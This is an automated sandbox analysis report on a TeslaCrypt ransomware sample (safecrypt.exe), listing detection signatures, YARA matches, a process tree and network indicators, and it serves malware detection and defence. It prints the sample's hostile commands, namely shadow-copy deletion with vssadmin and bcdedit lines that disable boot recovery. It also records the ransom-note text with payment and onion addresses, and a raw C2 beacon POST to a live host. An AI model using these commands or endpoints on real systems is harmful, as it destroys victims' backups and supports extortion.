Loading ...

Play interactive tourEdit tour

Analysis Report safecrypt.exe

Overview

General Information

Sample Name:safecrypt.exe
Analysis ID:375304
MD5:4a1d88603b1007825a9c6b36d1e5de44
SHA1:78a6e76ab32039576b52153b56f2e8bd035222c3
SHA256:7004af389d633b82c3ee67055ecb0f9accae5dc0a53721da66c76825ece528f8
Infos:

Most interesting Screenshot:

Detection

TeslaCrypt
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected TeslaCrypt Ransomware
Contains functionality to inject code into remote processes
Creates autostart registry keys with suspicious names
Creates files in the recycle bin to hide itself
Deletes shadow drive data (may be related to ransomware)
Found Tor onion address
Found potential ransomware demand text
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects a PE file into a foreign processes
Machine Learning detection for sample
May disable shadow drive data (uses vssadmin)
Uses bcdedit to modify the Windows boot settings
Writes a notice file (html or txt) to demand a ransom
Abnormal high CPU Usage
Contains capabilities to detect virtual machines
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a DirectInput object (often for capturing keystrokes)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found evasive API chain (may stop execution after checking a module file name)
Found evasive API chain checking for process token information
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • safecrypt.exe (PID: 4964 cmdline: 'C:\Users\user\Desktop\safecrypt.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
    • safecrypt.exe (PID: 5784 cmdline: 'C:\Users\user\Desktop\safecrypt.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
      • mllvvvh.exe (PID: 6072 cmdline: C:\Users\user\AppData\Roaming\mllvvvh.exe MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
        • mllvvvh.exe (PID: 5860 cmdline: C:\Users\user\AppData\Roaming\mllvvvh.exe MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
          • bcdedit.exe (PID: 3700 cmdline: bcdedit.exe /set {current} bootems off MD5: 6E05CD5195FDB8B6C68FC90074817293)
            • conhost.exe (PID: 4544 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • vssadmin.exe (PID: 4676 cmdline: 'C:\Windows\System32\vssadmin.exe' delete shadows /all /Quiet MD5: 47D51216EF45075B5F7EAA117CC70E40)
            • conhost.exe (PID: 4704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • bcdedit.exe (PID: 5944 cmdline: bcdedit.exe /set {current} advancedoptions off MD5: 6E05CD5195FDB8B6C68FC90074817293)
            • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • bcdedit.exe (PID: 4112 cmdline: bcdedit.exe /set {current} optionsedit off MD5: 6E05CD5195FDB8B6C68FC90074817293)
            • conhost.exe (PID: 6004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • bcdedit.exe (PID: 6032 cmdline: bcdedit.exe /set {current} bootstatuspolicy IgnoreAllFailures MD5: 6E05CD5195FDB8B6C68FC90074817293)
            • conhost.exe (PID: 5992 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • bcdedit.exe (PID: 6008 cmdline: bcdedit.exe /set {current} recoveryenabled off MD5: 6E05CD5195FDB8B6C68FC90074817293)
            • conhost.exe (PID: 5116 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • cmd.exe (PID: 5864 cmdline: 'C:\Windows\system32\cmd.exe' /c DEL C:\Users\user\Desktop\SAFECR~1.EXE MD5: F3BDBE3BB6F734E357235F4D5898582D)
        • conhost.exe (PID: 2924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • mllvvvh.exe (PID: 1224 cmdline: 'C:\Users\user\AppData\Roaming\mllvvvh.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
    • mllvvvh.exe (PID: 5880 cmdline: 'C:\Users\user\AppData\Roaming\mllvvvh.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
  • mllvvvh.exe (PID: 4648 cmdline: 'C:\Users\user\AppData\Roaming\mllvvvh.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
    • mllvvvh.exe (PID: 1724 cmdline: 'C:\Users\user\AppData\Roaming\mllvvvh.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
  • mllvvvh.exe (PID: 2916 cmdline: 'C:\Users\user\AppData\Roaming\mllvvvh.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
    • mllvvvh.exe (PID: 5844 cmdline: 'C:\Users\user\AppData\Roaming\mllvvvh.exe' MD5: 4A1D88603B1007825A9C6B36D1E5DE44)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmpJoeSecurity_TeslaCryptYara detected TeslaCrypt RansomwareJoe Security
    00000004.00000001.330553837.0000000000400000.00000040.00020000.sdmpWin32_Ransomware_TeslacryptunknownReversingLabs
    • 0x13ad0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 A4 01 00 A1 1C D0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 ...
    • 0x13b76:$search_and_encrypt_2_0_4e_2: 0F 84 D4 02 00 00 F6 85 A8 BD FF FF 10 0F 84 D6 01 00 00 8D 8D D4 BD FF FF B8 F4 91 43 00 66 8B ...
    • 0x13c17:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 00 92 ...
    • 0x1b6a0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 AC 30 00 00 E8 00 29 01 00 A1 1C D0 43 00 33 C4 89 84 24
    • 0x1f3e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 34 22 00 00 E8 C0 EB 00 00 A1 1C D0 43 00 33 C4 89 84 24
    • 0x1b6a0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 AC 30 00 00 E8
    • 0x1f3e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 34 22 00 00 E8
    • 0x1b9d5:$server_communication_3_1: 8A 08 40 3A CB 75 F9 2B C7 50 8D 94 24 7C 01 00 00 8B CE E8 83 4F 00 00 83 C4 04 8D 44 24 60 50 ...
    • 0x1bb9f:$server_communication_3_2: 68 50 8C 43 00 88 9C 04 9C 14 00 00 51 88 9C 04 A1 14 00 00 FF 15 6C 12 43 00 83 C4 08 85 C0 75 ...
    • 0x1fd50:$file_search_3_1: 55 8B EC B8 70 20 00 00 E8 53 E2 00 00 A1 1C D0 43 00 33 C5 89 45 FC 56 57 33 C0 68 FE 1F 00 00 ...
    • 0x1fd92:$file_search_3_2_1: 68 50 A4 46 00 FF 15 04 12 43 00 50 68 50 C4 46 00 8D 85 E8 DF FF FF 68 14 89 43 00 50 BA 00 10 ...
    • 0x1fe11:$file_search_3_2_2: 8B 35 E0 10 43 00 8B 3D D0 10 43 00 83 C4 10 6A 00 8D 8D E8 DF FF FF 51 68 50 A4 46 00 FF D6 6A ...
    • 0x13c17:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 00 92 ...
    • 0x13c99:$search_and_encrypt_3_2: 1B C0 83 D8 FF 85 C0 0F 84 8D 01 00 00 8D 8D F8 DF FF FF B8 50 84 47 00 66 8B 10 66 3B 11 75 1E ...
    • 0x13d16:$search_and_encrypt_3_3: 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 0C 50 8D 8D F8 DF FF FF 51 E8 9D FD FF FF 8D 95 F8 ...
    • 0x13dd9:$search_and_encrypt_3_4: E8 95 24 01 00 83 C4 04 8B F0 57 56 E8 39 23 01 00 83 C4 08 B8 08 92 43 00 8B CE E8 67 FC FF FF ...
    00000019.00000001.389132336.0000000000400000.00000040.00020000.sdmpWin32_Ransomware_TeslacryptunknownReversingLabs
    • 0x13ad0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 A4 01 00 A1 1C D0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 ...
    • 0x13b76:$search_and_encrypt_2_0_4e_2: 0F 84 D4 02 00 00 F6 85 A8 BD FF FF 10 0F 84 D6 01 00 00 8D 8D D4 BD FF FF B8 F4 91 43 00 66 8B ...
    • 0x13c17:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 00 92 ...
    • 0x1b6a0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 AC 30 00 00 E8 00 29 01 00 A1 1C D0 43 00 33 C4 89 84 24
    • 0x1f3e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 34 22 00 00 E8 C0 EB 00 00 A1 1C D0 43 00 33 C4 89 84 24
    • 0x1b6a0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 AC 30 00 00 E8
    • 0x1f3e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 34 22 00 00 E8
    • 0x1b9d5:$server_communication_3_1: 8A 08 40 3A CB 75 F9 2B C7 50 8D 94 24 7C 01 00 00 8B CE E8 83 4F 00 00 83 C4 04 8D 44 24 60 50 ...
    • 0x1bb9f:$server_communication_3_2: 68 50 8C 43 00 88 9C 04 9C 14 00 00 51 88 9C 04 A1 14 00 00 FF 15 6C 12 43 00 83 C4 08 85 C0 75 ...
    • 0x1fd50:$file_search_3_1: 55 8B EC B8 70 20 00 00 E8 53 E2 00 00 A1 1C D0 43 00 33 C5 89 45 FC 56 57 33 C0 68 FE 1F 00 00 ...
    • 0x1fd92:$file_search_3_2_1: 68 50 A4 46 00 FF 15 04 12 43 00 50 68 50 C4 46 00 8D 85 E8 DF FF FF 68 14 89 43 00 50 BA 00 10 ...
    • 0x1fe11:$file_search_3_2_2: 8B 35 E0 10 43 00 8B 3D D0 10 43 00 83 C4 10 6A 00 8D 8D E8 DF FF FF 51 68 50 A4 46 00 FF D6 6A ...
    • 0x13c17:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 00 92 ...
    • 0x13c99:$search_and_encrypt_3_2: 1B C0 83 D8 FF 85 C0 0F 84 8D 01 00 00 8D 8D F8 DF FF FF B8 50 84 47 00 66 8B 10 66 3B 11 75 1E ...
    • 0x13d16:$search_and_encrypt_3_3: 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 0C 50 8D 8D F8 DF FF FF 51 E8 9D FD FF FF 8D 95 F8 ...
    • 0x13dd9:$search_and_encrypt_3_4: E8 95 24 01 00 83 C4 04 8B F0 57 56 E8 39 23 01 00 83 C4 08 B8 08 92 43 00 8B CE E8 67 FC FF FF ...
    00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmpJoeSecurity_TeslaCryptYara detected TeslaCrypt RansomwareJoe Security
      00000001.00000001.325563436.0000000000400000.00000040.00020000.sdmpWin32_Ransomware_TeslacryptunknownReversingLabs
      • 0x13ad0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 A4 01 00 A1 1C D0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 ...
      • 0x13b76:$search_and_encrypt_2_0_4e_2: 0F 84 D4 02 00 00 F6 85 A8 BD FF FF 10 0F 84 D6 01 00 00 8D 8D D4 BD FF FF B8 F4 91 43 00 66 8B ...
      • 0x13c17:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 00 92 ...
      • 0x1b6a0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 AC 30 00 00 E8 00 29 01 00 A1 1C D0 43 00 33 C4 89 84 24
      • 0x1f3e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 34 22 00 00 E8 C0 EB 00 00 A1 1C D0 43 00 33 C4 89 84 24
      • 0x1b6a0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 AC 30 00 00 E8
      • 0x1f3e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 34 22 00 00 E8
      • 0x1b9d5:$server_communication_3_1: 8A 08 40 3A CB 75 F9 2B C7 50 8D 94 24 7C 01 00 00 8B CE E8 83 4F 00 00 83 C4 04 8D 44 24 60 50 ...
      • 0x1bb9f:$server_communication_3_2: 68 50 8C 43 00 88 9C 04 9C 14 00 00 51 88 9C 04 A1 14 00 00 FF 15 6C 12 43 00 83 C4 08 85 C0 75 ...
      • 0x1fd50:$file_search_3_1: 55 8B EC B8 70 20 00 00 E8 53 E2 00 00 A1 1C D0 43 00 33 C5 89 45 FC 56 57 33 C0 68 FE 1F 00 00 ...
      • 0x1fd92:$file_search_3_2_1: 68 50 A4 46 00 FF 15 04 12 43 00 50 68 50 C4 46 00 8D 85 E8 DF FF FF 68 14 89 43 00 50 BA 00 10 ...
      • 0x1fe11:$file_search_3_2_2: 8B 35 E0 10 43 00 8B 3D D0 10 43 00 83 C4 10 6A 00 8D 8D E8 DF FF FF 51 68 50 A4 46 00 FF D6 6A ...
      • 0x13c17:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 00 92 ...
      • 0x13c99:$search_and_encrypt_3_2: 1B C0 83 D8 FF 85 C0 0F 84 8D 01 00 00 8D 8D F8 DF FF FF B8 50 84 47 00 66 8B 10 66 3B 11 75 1E ...
      • 0x13d16:$search_and_encrypt_3_3: 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 0C 50 8D 8D F8 DF FF FF 51 E8 9D FD FF FF 8D 95 F8 ...
      • 0x13dd9:$search_and_encrypt_3_4: E8 95 24 01 00 83 C4 04 8B F0 57 56 E8 39 23 01 00 83 C4 08 B8 08 92 43 00 8B CE E8 67 FC FF FF ...
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      4.1.mllvvvh.exe.400000.0.unpackJoeSecurity_TeslaCryptYara detected TeslaCrypt RansomwareJoe Security
        4.1.mllvvvh.exe.400000.0.unpackWin32_Ransomware_TeslacryptunknownReversingLabs
        • 0x12ed0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 A4 01 00 A1 1C D0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 ...
        • 0x12f76:$search_and_encrypt_2_0_4e_2: 0F 84 D4 02 00 00 F6 85 A8 BD FF FF 10 0F 84 D6 01 00 00 8D 8D D4 BD FF FF B8 F4 91 43 00 66 8B ...
        • 0x13017:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 00 92 ...
        • 0x1aaa0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 AC 30 00 00 E8 00 29 01 00 A1 1C D0 43 00 33 C4 89 84 24
        • 0x1e7e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 34 22 00 00 E8 C0 EB 00 00 A1 1C D0 43 00 33 C4 89 84 24
        • 0x1aaa0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 AC 30 00 00 E8
        • 0x1e7e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 34 22 00 00 E8
        • 0x1add5:$server_communication_3_1: 8A 08 40 3A CB 75 F9 2B C7 50 8D 94 24 7C 01 00 00 8B CE E8 83 4F 00 00 83 C4 04 8D 44 24 60 50 ...
        • 0x1af9f:$server_communication_3_2: 68 50 8C 43 00 88 9C 04 9C 14 00 00 51 88 9C 04 A1 14 00 00 FF 15 6C 12 43 00 83 C4 08 85 C0 75 ...
        • 0x1f150:$file_search_3_1: 55 8B EC B8 70 20 00 00 E8 53 E2 00 00 A1 1C D0 43 00 33 C5 89 45 FC 56 57 33 C0 68 FE 1F 00 00 ...
        • 0x1f192:$file_search_3_2_1: 68 50 A4 46 00 FF 15 04 12 43 00 50 68 50 C4 46 00 8D 85 E8 DF FF FF 68 14 89 43 00 50 BA 00 10 ...
        • 0x1f211:$file_search_3_2_2: 8B 35 E0 10 43 00 8B 3D D0 10 43 00 83 C4 10 6A 00 8D 8D E8 DF FF FF 51 68 50 A4 46 00 FF D6 6A ...
        • 0x13017:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 00 92 ...
        • 0x13099:$search_and_encrypt_3_2: 1B C0 83 D8 FF 85 C0 0F 84 8D 01 00 00 8D 8D F8 DF FF FF B8 50 84 47 00 66 8B 10 66 3B 11 75 1E ...
        • 0x13116:$search_and_encrypt_3_3: 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 0C 50 8D 8D F8 DF FF FF 51 E8 9D FD FF FF 8D 95 F8 ...
        • 0x131d9:$search_and_encrypt_3_4: E8 95 24 01 00 83 C4 04 8B F0 57 56 E8 39 23 01 00 83 C4 08 B8 08 92 43 00 8B CE E8 67 FC FF FF ...
        1.2.safecrypt.exe.400000.0.unpackJoeSecurity_TeslaCryptYara detected TeslaCrypt RansomwareJoe Security
          1.2.safecrypt.exe.400000.0.unpackWin32_Ransomware_TeslacryptunknownReversingLabs
          • 0x12ed0:$search_and_encrypt_2_0_4e_1: 55 8B EC B8 5C 42 00 00 E8 D3 A4 01 00 A1 1C D0 43 00 33 C5 89 45 FC 53 8B 5D 08 56 57 33 C0 68 ...
          • 0x12f76:$search_and_encrypt_2_0_4e_2: 0F 84 D4 02 00 00 F6 85 A8 BD FF FF 10 0F 84 D6 01 00 00 8D 8D D4 BD FF FF B8 F4 91 43 00 66 8B ...
          • 0x13017:$search_and_encrypt_2_0_4e_3: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 00 92 ...
          • 0x1aaa0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 AC 30 00 00 E8 00 29 01 00 A1 1C D0 43 00 33 C4 89 84 24
          • 0x1e7e0:$server_communication_4_0_1: 55 8B EC 83 E4 F8 B8 34 22 00 00 E8 C0 EB 00 00 A1 1C D0 43 00 33 C4 89 84 24
          • 0x1aaa0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 AC 30 00 00 E8
          • 0x1e7e0:$server_communication_4_1b_1: 55 8B EC 83 E4 F8 B8 34 22 00 00 E8
          • 0x1add5:$server_communication_3_1: 8A 08 40 3A CB 75 F9 2B C7 50 8D 94 24 7C 01 00 00 8B CE E8 83 4F 00 00 83 C4 04 8D 44 24 60 50 ...
          • 0x1af9f:$server_communication_3_2: 68 50 8C 43 00 88 9C 04 9C 14 00 00 51 88 9C 04 A1 14 00 00 FF 15 6C 12 43 00 83 C4 08 85 C0 75 ...
          • 0x1f150:$file_search_3_1: 55 8B EC B8 70 20 00 00 E8 53 E2 00 00 A1 1C D0 43 00 33 C5 89 45 FC 56 57 33 C0 68 FE 1F 00 00 ...
          • 0x1f192:$file_search_3_2_1: 68 50 A4 46 00 FF 15 04 12 43 00 50 68 50 C4 46 00 8D 85 E8 DF FF FF 68 14 89 43 00 50 BA 00 10 ...
          • 0x1f211:$file_search_3_2_2: 8B 35 E0 10 43 00 8B 3D D0 10 43 00 83 C4 10 6A 00 8D 8D E8 DF FF FF 51 68 50 A4 46 00 FF D6 6A ...
          • 0x13017:$search_and_encrypt_3_1: 8B C3 83 C4 0C 8D 50 02 90 66 8B 08 83 C0 02 66 85 C9 75 F5 2B C2 D1 F8 83 F8 03 76 19 68 00 92 ...
          • 0x13099:$search_and_encrypt_3_2: 1B C0 83 D8 FF 85 C0 0F 84 8D 01 00 00 8D 8D F8 DF FF FF B8 50 84 47 00 66 8B 10 66 3B 11 75 1E ...
          • 0x13116:$search_and_encrypt_3_3: 1B C0 83 D8 FF 85 C0 0F 84 10 01 00 00 8B 45 0C 50 8D 8D F8 DF FF FF 51 E8 9D FD FF FF 8D 95 F8 ...
          • 0x131d9:$search_and_encrypt_3_4: E8 95 24 01 00 83 C4 04 8B F0 57 56 E8 39 23 01 00 83 C4 08 B8 08 92 43 00 8B CE E8 67 FC FF FF ...
          1.1.safecrypt.exe.400000.0.unpackJoeSecurity_TeslaCryptYara detected TeslaCrypt RansomwareJoe Security
            Click to see the 27 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Antivirus / Scanner detection for submitted sampleShow sources
            Source: safecrypt.exeAvira: detected
            Antivirus detection for URL or domainShow sources
            Source: http://pot98bza3sgfjr35t.fausttime.com/BC32439525276233Avira URL Cloud: Label: phishing
            Source: http://pot98bza3sgfjr35t.fausttime.com/%SAvira URL Cloud: Label: phishing
            Source: http://pot98bza3sgfjr35t.fausttime.com/%S2.Avira URL Cloud: Label: phishing
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeMetadefender: Detection: 73%Perma Link
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeReversingLabs: Detection: 96%
            Multi AV Scanner detection for submitted fileShow sources
            Source: safecrypt.exeVirustotal: Detection: 91%Perma Link
            Source: safecrypt.exeMetadefender: Detection: 73%Perma Link
            Source: safecrypt.exeReversingLabs: Detection: 96%
            Machine Learning detection for sampleShow sources
            Source: safecrypt.exeJoe Sandbox ML: detected

            Compliance:

            barindex
            Detected unpacking (overwrites its own PE header)Show sources
            Source: C:\Users\user\Desktop\safecrypt.exeUnpacked PE file: 1.2.safecrypt.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 20.2.mllvvvh.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 23.2.mllvvvh.exe.400000.0.unpack
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeUnpacked PE file: 25.2.mllvvvh.exe.400000.0.unpack
            Source: safecrypt.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose,1_2_00413AD0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_1_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose,1_1_00413AD0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 4_1_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose,4_1_00413AD0
            Source: C:\Users\user\AppData\Roaming\mllvvvh.exeCode function: 20_2_00413AD0 _memset,_memset,FindFirstFileW,__wcsdup,_free,FindNextFileW,FindClose,20_2_00413AD0
            Source: C:\Users\user\Desktop\safecrypt.exeCode function: 1_2_00413860 GetLogicalDriveStringsW,_memset,GetVolumeInformationW,GetDriveTypeW,GetVolumeInformationW,ExitThread,1_2_00413860

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2022504 ET TROJAN Alphacrypt/TeslaCrypt Ransomware CnC Beacon 192.168.2.6:49709 -> 185.53.178.54:80
            Source: TrafficSnort IDS: 2022504 ET TROJAN Alphacrypt/TeslaCrypt Ransomware CnC Beacon 192.168.2.6:49710 -> 52.60.87.163:80
            Found Tor onion addressShow sources
            Source: safecrypt.exeString found in binary or memory: r personal pages: http://pot98bza3sgfjr35t.fausttime.com/%S http://h5534bvnrnkj345.maniupulp.com/%S http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S !!! Your personal page Tor-Browser: wbozgklno6x2vfrk.onion/%S !!! Your personal identification ID: %S
            Source: mllvvvh.exeString found in binary or memory: r personal pages: http://pot98bza3sgfjr35t.fausttime.com/%S http://h5534bvnrnkj345.maniupulp.com/%S http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S !!! Your personal page Tor-Browser: wbozgklno6x2vfrk.onion/%S !!! Your personal identification ID: %S
            Source: mllvvvh.exeString found in binary or memory: r personal pages: http://pot98bza3sgfjr35t.fausttime.com/%S http://h5534bvnrnkj345.maniupulp.com/%S http://i4sdmjn4fsdsdqfhu12l.orbyscabz.com/%S !!! Your personal page Tor-Browser: wbozgklno6x2vfrk.onion/%S !!! Your personal identification ID: %S
            Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
            Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
            Source: global trafficHTTP traffic detected: POST /modules/mod_fxprev/libraries/mzsys.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; Trident/7.0; Touch; rv:11.0) like GeckoHost: educarpetas.comContent-Length: 645Cache-Control: no-cacheData Raw: 64 61 74 61 3d 45 44 41 42 46 42 39 35 32 32 41 46 36 33 45 43 41 43 39 43 42 36 43 44 44 36 42 35 30 34 36 36 32 35 42 35 43 36 34 33 41 38 30 35 33 44 30 34 33 39 37 44 33 37 46 33 44 44 44 34 30 44 34 30 36 42 36 34 37 44 31 41 34 32 30 43 31 36 34 42 32 42 44 30 39 35 44 35 31 43 43 30 38 44 36 43 30 44 42 34 36 38 35 42 36 35 34 43 31 44 46 32 36 42 45 43 45 36 34 41 43 33 36 39 34 45 36 42 45 38 45 35 35 42 42 41 42 33 39 37 33 41 33 41 33 41 43 37 38 30 41 32 45 31 42 32 30 46 45 31 43 44 33 43 33 35 39 42 30 38 39 34 43 36 41 46 37 31 45 44 38 45 42 33 38 38 36 34 41 41 39 42 42 42 45 43 39 38 43 45 44 31 42 43 42 42 41 39 39 35 38 41 33 37 43 42 35 30 43 36 36 39 35 42 33 33 42 42 44 38 45 43 39 38 33 41 38 32 35 45 32 32 44 46 45 44 46 38 36 30 45 37 36 31 36 30 41 44 41 35 35 37 44 43 34 43 33 44 37 38 32 36 35 37 39 39 37 31 38 32 31 43 44 46 38 30 38 44 41 38 30 34 41 41 43 45 46 34 42 45 45 34 33 38 46 39 30 36 44 31 33 31 31 45 34 45 45 39 45 46 37 37 33 33 33 38 45 38 42 44 44 44 42 39 46 34 45 46 39 37 38 45 30 34 42 41 39 31 41 38 35 42 44 45 35 33 32 31 39 41 38 43 34 43 36 37 34 32 39 46 30 43 33 46 32 31 45 36 43 41 33 36 44 36 45 42 32 34 32 39 38 42 37 45 39 35 38 30 45 33 41 45 34 33 36 38 35 41 33 43 44 44 42 32 32 42 30 42 35 32 42 32 37 44 45 30 42 36 46 43 44 30 35 36 43 33 33 35 31 30 34 42 45 32 44 41 41 37 45 32 46 42 43 41 42 41 41 30 44 46 37 39 37 36 37 30 37 35 31 42 30 46 36 41 35 35 45 31 30 38 30 32 37 32 32 44 46 43 43 42 31 43 46 43 32 34 46 31 37 34 42 38 46 35 33 39 30 36 46 35 42 46 31 41 43 30 38 44 41 37 36 33 36 43 35 34 30 37 33 31 44 34 36 35 44 30 43 42 36 44 39 37 45 38 39 31 43 39 31 39 32 43 39 39 41 41 44 32 46 39 30 39 32 33 44 38 35 34 38 41 39 34 36 43 35 42 36 45 41 43 46 37 41 31 46 41 45 45 41 44 45 32 45 36 37 41 44 35 45 39 35 39 33 43 34 36 34 37 30 41 38 37 39 44 34 36 31 32 34 30 31 30 46 41 42 37 44 32 42 42 34 37 30 43 37 37 39 43 36 39 Data Ascii: 